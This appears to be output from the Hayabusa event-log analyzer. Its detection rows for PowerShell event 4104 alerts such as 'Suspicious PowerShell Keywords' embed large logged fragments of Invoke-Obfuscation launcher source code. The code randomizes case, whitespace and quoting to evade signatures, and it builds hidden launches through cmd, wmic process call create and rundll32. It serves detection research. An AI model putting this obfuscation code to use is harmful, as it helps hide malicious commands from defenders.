Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$PathToPowerShell = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe"" $PathToPowerShell = ""powershell"" } # Randomize the case of the following variables. $PowerShellFlags = ([Char[]]$PowerShellFlags.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToPowerShell = ([Char[]]$PathToPowerShell.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToRunDll = ([Char[]]$PathToRunDll.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToMshta = ([Char[]]$PathToMshta.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToCmd = ([Char[]]$PathToCmd.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToClip = ([Char[]]$PathToClip.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToWmic = ([Char[]]$PathToWmic.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SlashC = ([Char[]]'/c'.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $Echo = ([Char[]]'echo'.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Show warning if an uneven number of double-quotes exists for any $LaunchType. $NumberOfDoubleQuotes = $ScriptString.Length-$ScriptString.Replace('""','').Length If($NumberOfDoubleQuotes%2 -eq 1) { Write-Host """" Write-Warning ""This command contains an unbalanced number of double quotes ($NumberOfDoubleQuotes).`n Try applying STRING or ENCODING obfuscation options first to encode the double quotes.`n"" Start-Sleep 1 Return $ScriptString } # If no $LaunchType is specified then randomly choose from options 3-20. If($LaunchType -eq 0) { $LaunchType = Get-Random -Input @(3..12) } # Select launcher syntax. Switch($LaunchType) { 1 { ######## ## PS ## ######## # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",$Char)} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + '""' + $ScriptString + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToPowerShell + $PSCmdSyntax } 2 { ######### ## CMD ## ######### # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",$Char)} If($ScriptString.Contains(""^$Char"")) {$ScriptString = $ScriptString.Replace(""^$Char"",""^^^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + '""' + $ScriptString + '""' $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PSCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToCmd + $CmdSyntax } 3 { ########## ## WMIC ## ########## # WMIC errors when variables contain more than 2 adjacent whitespaces in variable names. Thus we are escaping them here. For($i=1; $i -le 12; $i++) { $StringToReplace = '${' + ' '*$i + '}' If($ScriptString.Contains($StringToReplace)) { $ScriptString = $ScriptString.Replace($StringToReplace,$StringToReplace.Replace(' ','\ ')) } } # Undo escaping from beginning of function. $CharsToEscape is defined at beginning of this function. ForEach($Char in $CharsToEscape) { While($ScriptString.Contains('^' + $Char)) { $ScriptString = $ScriptString.Replace(('^' + $Char),$Char) } } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Perform inline substitutions to remove commas from command line for wmic.exe. If($ScriptString.Contains(',')) { # SetVariables will only be used if more than 5 double quotes or more than 5 commas need to be escaped. $SetVariables = '' # Since we are converting the PowerShell command into strings for concatenation we need to escape and double-escape $ for proper variable interpretation by PowerShell. If($ScriptString.Contains('$')) { $ScriptString = $ScriptString.Replace('$','`$') # Double escape any $ characters that were already escaped prior to above escaping step. If($ScriptString.Contains('``$')) { $ScriptString = $ScriptString.Replace('``$','```$') } } # Double escape any escaped "" characters. If($ScriptString.Contains('`""')) { $ScriptString = $ScriptString.Replace('`""','``""') } # Substitute double quotes as well if we're substituting commas as this requires treating the entire command as a string by encapsulating it with double quotes. If($ScriptString.Contains('""')) { # Remove all layers of escaping for double quotes as they are no longer necessary since we're casting these double quotes to ASCII values. While($ScriptString.Contains('\""')) { $ScriptString = $ScriptString.Replace('\""','""') } # Randomly select a syntax for the Char conversion of a double quote ASCII value and then ramdomize the case. $CharCastDoubleQuote = ([Char[]](Get-Random -Input @('[String][Char]34','([Char]34).ToString()')) | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' If($ScriptString.Length-$ScriptString.Replace('""','').Length -le 5) { # Replace double quote(s) with randomly selected ASCII value conversion representation -- inline concatenation. $SubstitutionSyntax = ('\""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $CharCastDoubleQuote + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '\""') $ScriptString = $ScriptString.Replace('""',$SubstitutionSyntax).Replace('\""\""+','').Replace('\""\"" +','').Replace('\""\"" +','').Replace('\""\"" +','') } Else { # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(1..2)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. $RandomVarNameMaybeConcatenated = $RandomVarName",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"event the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command'] -OR $Command) { $FullArgument = ""-Command"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. # Maintain array of PS flags for some launch types (namely CLIP+, CLIP++ and RunDll32). $PowerShellFlagsArray = $PowerShellFlags $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out paths to binaries depending if 32-bit or 64-bit options were selected. $System32Path = $Env:ComSpec.SubString(0,$Env:ComSpec.LastIndexOf('\')) $PathToRunDll = Get-Random -Input @(""$System32Path\rundll32"" , ""$System32Path\rundll32.exe"" , ""rundll32"" , ""rundll32.exe"") $PathToMshta = Get-Random -Input @(""$System32Path\mshta"" , ""$System32Path\mshta.exe"" , ""mshta"" , ""mshta.exe"") $PathToCmd = Get-Random -Input @(""$System32Path\cmd"" , ""$System32Path\cmd.exe"" , ""cmd.exe"" , ""cmd"") $PathToClip = Get-Random -Input @(""$System32Path\clip"" , ""$System32Path\clip.exe"" , ""clip"" , ""clip.exe"") $PathToWmic = Get-Random -Input @(""$System32Path\WBEM\wmic"" , ""$System32Path\WBEM\wmic.exe"" , ""wmic"" , ""wmic.exe"") # If you use cmd or cmd.exe instead of the pathed version, then you don't need to put a whitespace between cmd and and cmd flags. E.g. cmd/c or cmd.exe/c. If($PathToCmd.Contains('\')) { $PathToCmd = $PathToCmd + ' '*(Get-Random -Minimum 2 -Maximum 4) } Else { $PathToCmd = $PathToCmd + ' '*(Get-Random -Minimum 0 -Maximum 4) } If($PSBoundParameters['Wow64'] -OR $Wow64) { $PathToPowerShell = ""$($Env:WinDir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$PathToPowerShell = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe"" $PathToPowerShell = ""powershell"" } # Randomize the case of the following variables. $PowerShellFlags = ([Char[]]$PowerShellFlags.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToPowerShell = ([Char[]]$PathToPowerShell.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToRunDll = ([Char[]]$PathToRunDll.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToMshta = ([Char[]]$PathToMshta.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToCmd = ([Char[]]$PathToCmd.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToClip = ([Char[]]$PathToClip.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToWmic = ([Char[]]$PathToWmic.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SlashC = ([Char[]]'/c'.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $Echo = ([Char[]]'echo'.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Show warning if an uneven number of double-quotes exists for any $LaunchType. $NumberOfDoubleQuotes = $ScriptString.Length-$ScriptString.Replace('""','').Length If($NumberOfDoubleQuotes%2 -eq 1) { Write-Host """" Write-Warning ""This command contains an unbalanced number of double quotes ($NumberOfDoubleQuotes).`n Try applying STRING or ENCODING obfuscation options first to encode the double quotes.`n"" Start-Sleep 1 Return $ScriptString } # If no $LaunchType is specified then randomly choose from options 3-20. If($LaunchType -eq 0) { $LaunchType = Get-Random -Input @(3..12) } # Select launcher syntax. Switch($LaunchType) { 1 { ######## ## PS ## ######## # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",$Char)} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + '""' + $ScriptString + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToPowerShell + $PSCmdSyntax } 2 { ######### ## CMD ## ######### # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",$Char)} If($ScriptString.Contains(""^$Char"")) {$ScriptString = $ScriptString.Replace(""^$Char"",""^^^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + '""' + $ScriptString + '""' $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PSCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToCmd + $CmdSyntax } 3 { ########## ## WMIC ## ########## # WMIC errors when variables contain more than 2 adjacent whitespaces in variable names. Thus we are escaping them here. For($i=1; $i -le 12; $i++) { $StringToReplace = '${' + ' '*$i + '}' If($ScriptString.Contains($StringToReplace)) { $ScriptString = $ScriptString.Replace($StringToReplace,$StringToReplace.Replace(' ','\ ')) } } # Undo escaping from beginning of function. $CharsToEscape is defined at beginning of this function. ForEach($Char in $CharsToEscape) { While($ScriptString.Contains('^' + $Char)) { $ScriptString = $ScriptString.Replace(('^' + $Char),$Char) } } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Perform inline substitutions to remove commas from command line for wmic.exe. If($ScriptString.Contains(',')) { # SetVariables will only be used if more than 5 double quotes or more than 5 commas need to be escaped. $SetVariables = '' # Since we are converting the PowerShell command into strings for concatenation we need to escape and double-escape $ for proper variable interpretation by PowerShell. If($ScriptString.Contains('$')) { $ScriptString = $ScriptString.Replace('$','`$') # Double escape any $ characters that were already escaped prior to above escaping step. If($ScriptString.Contains('``$')) { $ScriptString = $ScriptString.Replace('``$','```$') } } # Double escape any escaped "" characters. If($ScriptString.Contains('`""')) { $ScriptString = $ScriptString.Replace('`""','``""') } # Substitute double quotes as well if we're substituting commas as this requires treating the entire command as a string by encapsulating it with double quotes. If($ScriptString.Contains('""')) { # Remove all layers of escaping for double quotes as they are no longer necessary since we're casting these double quotes to ASCII values. While($ScriptString.Contains('\""')) { $ScriptString = $ScriptString.Replace('\""','""') } # Randomly select a syntax for the Char conversion of a double quote ASCII value and then ramdomize the case. $CharCastDoubleQuote = ([Char[]](Get-Random -Input @('[String][Char]34','([Char]34).ToString()')) | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' If($ScriptString.Length-$ScriptString.Replace('""','').Length -le 5) { # Replace double quote(s) with randomly selected ASCII value conversion representation -- inline concatenation. $SubstitutionSyntax = ('\""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $CharCastDoubleQuote + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '\""') $ScriptString = $ScriptString.Replace('""',$SubstitutionSyntax).Replace('\""\""+','').Replace('\""\"" +','').Replace('\""\"" +','').Replace('\""\"" +','') } Else { # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(1..2)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. $RandomVarNameMaybeConcatenated = $RandomVarName",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName ""'"") + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $CharCastDoubleQuote $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $CharCastDoubleQuote + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Replace double quotes with randomly selected ASCII value conversion representation -- variable replacement to save space for high counts of double quotes to substitute. $SetVariables += $RandomVarSet + ' '*(Get-Random @(1..2)) + ';' $ScriptString = $ScriptString.Replace('""',""`${$RandomVarName}"") } } # Randomly select a syntax for the Char conversion of a comma ASCII value and then ramdomize the case. $CharCastComma= ([Char[]](Get-Random -Input @('[String][Char]44','([Char]44).ToString()')) | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' If($ScriptString.Length-$ScriptString.Replace(',','').Length -le 5) { # Replace commas with randomly selected ASCII value conversion representation -- inline concatenation. $SubstitutionSyntax = ('\""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $CharCastComma + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '\""') $ScriptString = $ScriptString.Replace(',',$SubstitutionSyntax).Replace('\""\""+','').Replace('\""\"" +','').Replace('\""\"" +','').Replace('\""\"" +','') } Else { # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(1..2)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. $RandomVarNameMaybeConcatenated = $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName ""'"") + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $CharCastComma $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $CharCastComma + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Replace commas with randomly selected ASCII value conversion representation -- variable replacement to save space for high counts of commas to substitute. $SetVariables += $RandomVarSet + ' '*(Get-Random @(1..2)) + ';' $ScriptString = $ScriptString.Replace(',',""`${$RandomVarName}"") } # Encapsulate entire command with escaped double quotes since entire command is now an inline concatenated string to support the above character substitution(s). $ScriptString = '\""' + $ScriptString + '\""' # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. # Keep running Out-EncapsulatedInvokeExpression until we get a syntax that does NOT contain commas. # Examples like .((gv '*mdR*').Name[3,11,2]-Join'') can have their commas escaped like in above step. However, wmic.exe errors with opening [ without a closing ] in the string literal. $ScriptStringTemp = ',' While($ScriptStringTemp.Contains(',')) { $ScriptStringTemp = Out-EncapsulatedInvokeExpression $ScriptString } # Now that we have an invocation syntax that does not contain commas we will set $ScriptStringTemp's results back into $ScriptString. $ScriptString = $ScriptStringTemp # Prepend with $SetVariables (which will be blank if no variables were set in above sustitution logic depending on the number of double quotes and commas that need to be replaced. $ScriptString = $SetVariables + $ScriptString } # Generate random case syntax for PROCESS CALL CREATE arguments for WMIC.exe. $WmicArguments = ([Char[]]'process call create' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Randomize the whitespace between each element of $WmicArguments which randomly deciding between encapsulating each argument with single quotes, double quotes or no quote. $WmicArguments = (($WmicArguments.Split(' ') | ForEach-Object {$RandomQuotes = (Get-Random -Input @('""',""'"",' ')); $RandomQuotes + $_ + $RandomQuotes + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '').Trim() # Pair escaped double quotes with a prepended additional double quote so that wmic.exe does not treat the string as a separate argument for wmic.exe but the double quote still exists for powershell.exe's functionality. If($ScriptString.Contains('\""')) { $ScriptString = $ScriptString.Replace('\""','""\""') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $ScriptString $WmicCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $WmicArguments + ' '*(Get-Random -Minimum 1 -Maximum 4) + '""' + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. # Even though wmic.exe will show in command line arguments, it will not be the parent process of powershell.exe. Instead, the already-existing instance of WmiPrvSE.exe will spawn powershell.exe. $ArgsDefenderWillSee += , @(""[Unrelated to WMIC.EXE execution] C:\WINDOWS\system32\wbem\wmiprvse.exe"", "" -secured -Embedding"") $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToWmic + $WmicCmdSyntax } 4 { ############ ## RUNDLL ## ############ # Shout out and big thanks to Matt Graeber (@mattifestation) for pointing out this method of executing any binary directly from rundll32.exe. # Undo escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Generate random case syntax for SHELL32.DLL argument for RunDll32.exe. $Shell32Dll = ([Char[]]'SHELL32.DLL' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Put the execution flags in the format required by rundll32.exe: each argument separately encapusulated in double quotes. $ExecutionFlagsRunDllSyntax = ($PowerShellFlagsArray | Where-Object {$_.Trim().Length -gt 0} | ForEach-Object {'""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $_ + ' '*(Get-Random -Minimum 0 -Maximum 3) + '""' + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '' # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $ExecutionFlagsRunDllSyntax + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$ScriptString`"""" $RunDllCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $Shell32Dll + (Get-Random -Input @(',',' ', ((Get-Random -Input @(',',',',',',' ',' ',' ') -Count (Get-Random -Input @(4..6)))-Join''))) + 'ShellExec_RunDLL' + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$PathToPowerShell`"""" + $PSCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToRunDll , $RunDllCmdSyntax) $ArgsDefenderWillSee += , @(""`""$PathToPowerShell`"""", $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToRunDll + $RunDllCmdSyntax } 5 { ########## ## VAR+ ## ########## # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable name to store the $ScriptString command. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeVariableSyntax = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Generate random case syntax for setting the above random variable name. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Build out command line syntax in reverse so we can di",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName ""'"") + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $CharCastDoubleQuote $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $CharCastDoubleQuote + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Replace double quotes with randomly selected ASCII value conversion representation -- variable replacement to save space for high counts of double quotes to substitute. $SetVariables += $RandomVarSet + ' '*(Get-Random @(1..2)) + ';' $ScriptString = $ScriptString.Replace('""',""`${$RandomVarName}"") } } # Randomly select a syntax for the Char conversion of a comma ASCII value and then ramdomize the case. $CharCastComma= ([Char[]](Get-Random -Input @('[String][Char]44','([Char]44).ToString()')) | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' If($ScriptString.Length-$ScriptString.Replace(',','').Length -le 5) { # Replace commas with randomly selected ASCII value conversion representation -- inline concatenation. $SubstitutionSyntax = ('\""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $CharCastComma + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '\""') $ScriptString = $ScriptString.Replace(',',$SubstitutionSyntax).Replace('\""\""+','').Replace('\""\"" +','').Replace('\""\"" +','').Replace('\""\"" +','') } Else { # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += 